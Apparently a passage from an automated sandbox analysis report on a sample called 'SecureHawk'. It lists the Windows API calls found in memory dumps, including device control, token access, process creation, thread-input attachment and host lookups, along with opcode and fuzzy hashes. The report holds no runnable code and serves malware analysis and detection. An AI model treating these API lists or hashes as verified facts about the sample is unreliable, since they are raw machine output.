                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: 673bc05c90c89fe497f1ea2de73f35fb69b582162db3456de218e3fa0d0f3c95
                                  • Instruction ID: d29a7768a986a0a0b9fcb01823b9cfd6d13b22ea0db2103479cd7955dd7094dd
                                  • Opcode Fuzzy Hash: 673bc05c90c89fe497f1ea2de73f35fb69b582162db3456de218e3fa0d0f3c95
                                  • Instruction Fuzzy Hash: FC11A332906B35EBCB2B2F70FC0569B379C9F19360F154D25F9459E191DE308A8087E8
                                  APIs
                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003541F2
                                  • _memset.LIBCMT ref: 00354213
                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00354265
                                  • CloseHandle.KERNEL32(00000000), ref: 0035426E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                  • String ID:
                                  • API String ID: 1157408455-0
                                  • Opcode ID: e73b0e98ed59051bb8fd5da8e59144af70a4015cdcf1329d3b32d2b36791e2f8
                                  • Instruction ID: 9e0dfee2f2c423dc70216caf99b9f6d7b3caaff0e14eb30a664592941f2d11e8
                                  • Opcode Fuzzy Hash: e73b0e98ed59051bb8fd5da8e59144af70a4015cdcf1329d3b32d2b36791e2f8
                                  • Instruction Fuzzy Hash: 5A11E7759013287AD7319BA5AC4DFABBB7CEF44720F0046DAF908E7190D2704E848BA4
                                  APIs
                                    • Part of subcall function 0030402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00357CBE,?,?,00000000), ref: 00304041
                                    • Part of subcall function 0030402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00357CBE,?,?,00000000,?,?), ref: 00304065
                                  • gethostbyname.WSOCK32(?,?,?), ref: 00366849
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366854
                                  • _memmove.LIBCMT ref: 00366881
                                  • inet_ntoa.WSOCK32(?), ref: 0036688C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                  • String ID:
                                  • API String ID: 1504782959-0
                                  • Opcode ID: f73b6cb8bd1488ac66841e3f8fb7a86299285d815fdadf1e061fda7f92ae5f11
                                  • Instruction ID: 59282a17dab6901b0d7707b56b8edf9f88c4705e64a00e50faceb97cacf6dc72
                                  • Opcode Fuzzy Hash: f73b6cb8bd1488ac66841e3f8fb7a86299285d815fdadf1e061fda7f92ae5f11
                                  • Instruction Fuzzy Hash: DF116376500109AFCB06FFA4DD56CEEB7B8EF08310B148165F505AB2A1DF31AE54DB61
                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003494FC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0034950E
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00349524
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0034953F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 57dd5cc1fa3bcd72257e669600ae0382d91f96786b1d8dd8ea27d8f652613d8d
                                  • Instruction ID: 001129f8b6d4ec4b714c1efa88f1250c7ff01acb83a52c120c688dc857e3abe6
                                  • Opcode Fuzzy Hash: 57dd5cc1fa3bcd72257e669600ae0382d91f96786b1d8dd8ea27d8f652613d8d
                                  • Instruction Fuzzy Hash: 37115E39900218FFDB12DF95CC84F9EBBB8FB49310F204096EA00BB254D671AE10DB90
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • DefDlgProcW.USER32(?,00000020,?), ref: 002F16B4
                                  • GetClientRect.USER32(?,?), ref: 0032B86C
                                  • GetCursorPos.USER32(?), ref: 0032B876
                                  • ScreenToClient.USER32(?,?), ref: 0032B881
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Client$CursorLongProcRectScreenWindow
                                  • String ID:
                                  • API String ID: 4127811313-0
                                  • Opcode ID: d7f0f332e72648edd524ff5e7db986492080260cec20956b32df4e73898e6df2
                                  • Instruction ID: 387226b12e244de3f8d30c12a14bd281a374d65902bbe0f4ae019d3def6635c8
                                  • Opcode Fuzzy Hash: d7f0f332e72648edd524ff5e7db986492080260cec20956b32df4e73898e6df2
                                  • Instruction Fuzzy Hash: BC114635A1011DEBCB05EF58C8969BEB7BCEB05305F9404A5FA01E7250C730AA618FA1
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002F214F
                                  • GetStockObject.GDI32(00000011), ref: 002F2163
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 002F216D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CreateMessageObjectSendStockWindow
                                  • String ID:
                                  • API String ID: 3970641297-0
                                  • Opcode ID: 30c2e8ac36180c0d7541542134aed680e42251d9eb401a651256505ddd30ab1c
                                  • Instruction ID: 619dbc276f211dec7374ba371e55111bdbd6c592e913fffe10dcf5257e1d9531
                                  • Opcode Fuzzy Hash: 30c2e8ac36180c0d7541542134aed680e42251d9eb401a651256505ddd30ab1c
                                  • Instruction Fuzzy Hash: 4311577211160EBFDB064FA09C84AEBBB6DEF593A4F040121FB0852011C7319C649BA4
                                  APIs
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00350358,?,003513AB,?,00008000), ref: 003517CA
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00350358,?,003513AB,?,00008000), ref: 003517EF
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00350358,?,003513AB,?,00008000), ref: 003517F9
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00350358,?,003513AB,?,00008000), ref: 0035182C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: 01e27f46eea5dd93d61977ad12a008850f50cef599b49798c66ed255be976451
                                  • Instruction ID: 754c9612fa03dd1b2ec70bfd0fabe32e606820f2096f646cc2807c5127e1190b
                                  • Opcode Fuzzy Hash: 01e27f46eea5dd93d61977ad12a008850f50cef599b49798c66ed255be976451
                                  • Instruction Fuzzy Hash: C0115A31C00618DBCF16AFA4D988BEEBBB8FF08712F054095ED41B2250CB305598CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                  • Instruction ID: 2ad62b254a383a4ca239b1b379443f980d777bf914e2f90fb12cf8b6e93f8f4f
                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                  • Instruction Fuzzy Hash: 9E014C3244815AFBCF135E84EC06CEE3F26BF18351B598415FA1898531D336D9B2EB81
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 0037B6D1
                                  • ScreenToClient.USER32(?,?), ref: 0037B6E9
                                  • ScreenToClient.USER32(?,?), ref: 0037B70D
                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B728
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: 3a90b725cce1883d0a1ae5ff1621cf1e8704ada5454acbaf2f2b96e6bc908259
                                  • Instruction ID: 427c2edde0a08d09b4f0bb2c5d437e031a48fae23a059ff8120ce8a11ffe2bc6
                                  • Opcode Fuzzy Hash: 3a90b725cce1883d0a1ae5ff1621cf1e8704ada5454acbaf2f2b96e6bc908259
                                  • Instruction Fuzzy Hash: C41132B9D00249EFDB41CF98C884AEEFBB9FF48310F108196E954E2610E735AA658F50
                                  APIs
                                  • _memset.LIBCMT ref: 0037BA31
                                  • _memset.LIBCMT ref: 0037BA40
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003B7F20,003B7F64), ref: 0037BA6F
                                  • CloseHandle.KERNEL32 ref: 0037BA81
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3277943733-0
                                  • Opcode ID: 41d615c581257521567222ef32bbb4763a431d8ea1215d27a100c76db765cc7e
                                  • Instruction ID: a3cbdeccbcaf94eac5a4e3d91f2eb1b1e1fe7d03ee67c5a49a22f35fa6458b84
                                  • Opcode Fuzzy Hash: 41d615c581257521567222ef32bbb4763a431d8ea1215d27a100c76db765cc7e
                                  • Instruction Fuzzy Hash: 50F082B69483447BE3532B61AC05FFB3A5CEB48758F000160BB08D91A1D7B59C50C7AC
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0035700E
                                    • Part of subcall function 00357AEC: _memset.LIBCMT ref: 00357B21
                                  • _memmove.LIBCMT ref: 00357031
                                  • _memset.LIBCMT ref: 0035703E
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0035704E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                  • String ID:
                                  • API String ID: 48991266-0
                                  • Opcode ID: 77c5101186030cc777b746702188372e0145ff53a4079bc7c834f0928cc2ce30
                                  • Instruction ID: b58d89fd422165c74b2c88c13056958d849e4c11982a0e35a41a953b199b774f
                                  • Opcode Fuzzy Hash: 77c5101186030cc777b746702188372e0145ff53a4079bc7c834f0928cc2ce30
                                  • Instruction Fuzzy Hash: 9AF0547A100104ABCF466F55EC85E8ABB29EF49321F08C095FE085E227C771A955DBB4
                                  APIs
                                    • Part of subcall function 002F16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002F1729
                                    • Part of subcall function 002F16CF: SelectObject.GDI32(?,00000000), ref: 002F1738
                                    • Part of subcall function 002F16CF: BeginPath.GDI32(?), ref: 002F174F
                                    • Part of subcall function 002F16CF: SelectObject.GDI32(?,00000000), ref: 002F1778
                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0037C163
                                  • LineTo.GDI32(00000000,?,?), ref: 0037C170
                                  • EndPath.GDI32(00000000), ref: 0037C180
                                  • StrokePath.GDI32(00000000), ref: 0037C18E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                  • String ID:
                                  • API String ID: 1539411459-0
                                  • Opcode ID: d1d03712c65feb50f5ae9a810ee612a949354740bd05b7d2960c1dc5ac7ee24c
                                  • Instruction ID: ec37b861f0a884d96a4dc5250e815c15b5031745d174922e7756225a3ee6b524
                                  • Opcode Fuzzy Hash: d1d03712c65feb50f5ae9a810ee612a949354740bd05b7d2960c1dc5ac7ee24c
                                  • Instruction Fuzzy Hash: 4FF0BE32001359BBDB132F50AC0EFCE3F5DAF05320F044140FA14650E283790565DFA5
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0034A852
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0034A865
                                  • GetCurrentThreadId.KERNEL32 ref: 0034A86C
                                  • AttachThreadInput.USER32(00000000), ref: 0034A873
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: f7aa62448b54913016f18b7f7b5844cd349a9164bd1ff8da0daf321e83eeabbd
                                  • Instruction ID: 3911d13113e1587573526b6557df20ca646a2389278053624c9cb5f2328e248e
                                  • Opcode Fuzzy Hash: f7aa62448b54913016f18b7f7b5844cd349a9164bd1ff8da0daf321e83eeabbd
                                  • Instruction Fuzzy Hash: 71E03932141328BAEB621BA29C0CEDB3F5CEF117A1F008060F50989060D7719955CBA0
                                  APIs
                                  • GetSysColor.USER32(00000008), ref: 002F260D
                                  • SetTextColor.GDI32(?,000000FF), ref: 002F2617
                                  • SetBkMode.GDI32(?,00000001), ref: 002F262C
                                  • GetStockObject.GDI32(00000005), ref: 002F2634
                                  • GetWindowDC.USER32(?,00000000), ref: 0032C0F4
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0032C101
                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0032C11A
                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0032C133
                                  • GetPixel.GDI32(00000000,?,?), ref: 0032C153
                                  • ReleaseDC.USER32(?,00000000), ref: 0032C15E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                  • String ID:
                                  • API String ID: 1946975507-0
                                  • Opcode ID: 30619680d1391e35fdadba0991e855696df51fc5bf2a9f0a1b62840771511167
                                  • Instruction ID: 1f42f7b4a1341857264dea2bec0563a963b049202ade6198df6dd60a1d5cef97
                                  • Opcode Fuzzy Hash: 30619680d1391e35fdadba0991e855696df51fc5bf2a9f0a1b62840771511167
                                  • Instruction Fuzzy Hash: 60E06531504344EADB675F74BC0D7E83B14EB05331F0483A6FA69480E187714598DB11
                                  APIs
                                  • GetCurrentThread.KERNEL32 ref: 0034911C
                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00348CE7), ref: 00349123
                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00348CE7), ref: 00349130
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00348CE7), ref: 00349137
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CurrentOpenProcessThreadToken
                                  • String ID:
                                  • API String ID: 3974789173-0
                                  • Opcode ID: fdba7ab44677f6a13929467e94a90bbe80ac0626554bb1d033665e76756cdbbf
                                  • Instruction ID: 2d373a4c35e54551f5517067cf781d7eb6d2c4976afc2c244e53147fa7434e99
                                  • Opcode Fuzzy Hash: fdba7ab44677f6a13929467e94a90bbe80ac0626554bb1d033665e76756cdbbf
                                  • Instruction Fuzzy Hash: BCE08672601311DBD7A61FF0AE0CB573BACEF54791F124858B245CD050E6749549CB50
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 003305A9
                                  • GetDC.USER32(00000000), ref: 003305B3
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003305D3
                                  • ReleaseDC.USER32(?), ref: 003305F4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CapsDesktopDeviceReleaseWindow
                                  • String ID:
                                  • API String ID: 2889604237-0
                                  • Opcode ID: 9cad6795ec7d572e80028517522360cb531c211db5adaae36bf18042db4b73ed
                                  • Instruction ID: 7aa01f86ac72453aa81ba6e4f562d4c969f534f39156dbfcc9ad88f5ca6b3c5d
                                  • Opcode Fuzzy Hash: 9cad6795ec7d572e80028517522360cb531c211db5adaae36bf18042db4b73ed
                                  • Instruction Fuzzy Hash: 84E0E5B2800204EFDB869F60D808A6DBBB9EF88350F108055F95AA7210DB7886559F50
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 003305BD
                                  • GetDC.USER32(00000000), ref: 003305C7
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003305D3
                                  • ReleaseDC.USER32(?), ref: 003305F4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CapsDesktopDeviceReleaseWindow
                                  • String ID:
                                  • API String ID: 2889604237-0
                                  • Opcode ID: dfa9de8c88922f0d89a3be828e60e52e658de649d5ea1c1aadf82b88e7d0bf48
                                  • Instruction ID: adc7b68d4ca32c1295bc9f62c61a377ba5fdae36caace87adefd46c5308b5837
                                  • Opcode Fuzzy Hash: dfa9de8c88922f0d89a3be828e60e52e658de649d5ea1c1aadf82b88e7d0bf48
                                  • Instruction Fuzzy Hash: E7E01AB2800304AFCB869F70D80866DBBF9EF8C350F108054FA59A7210DB7895558F50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
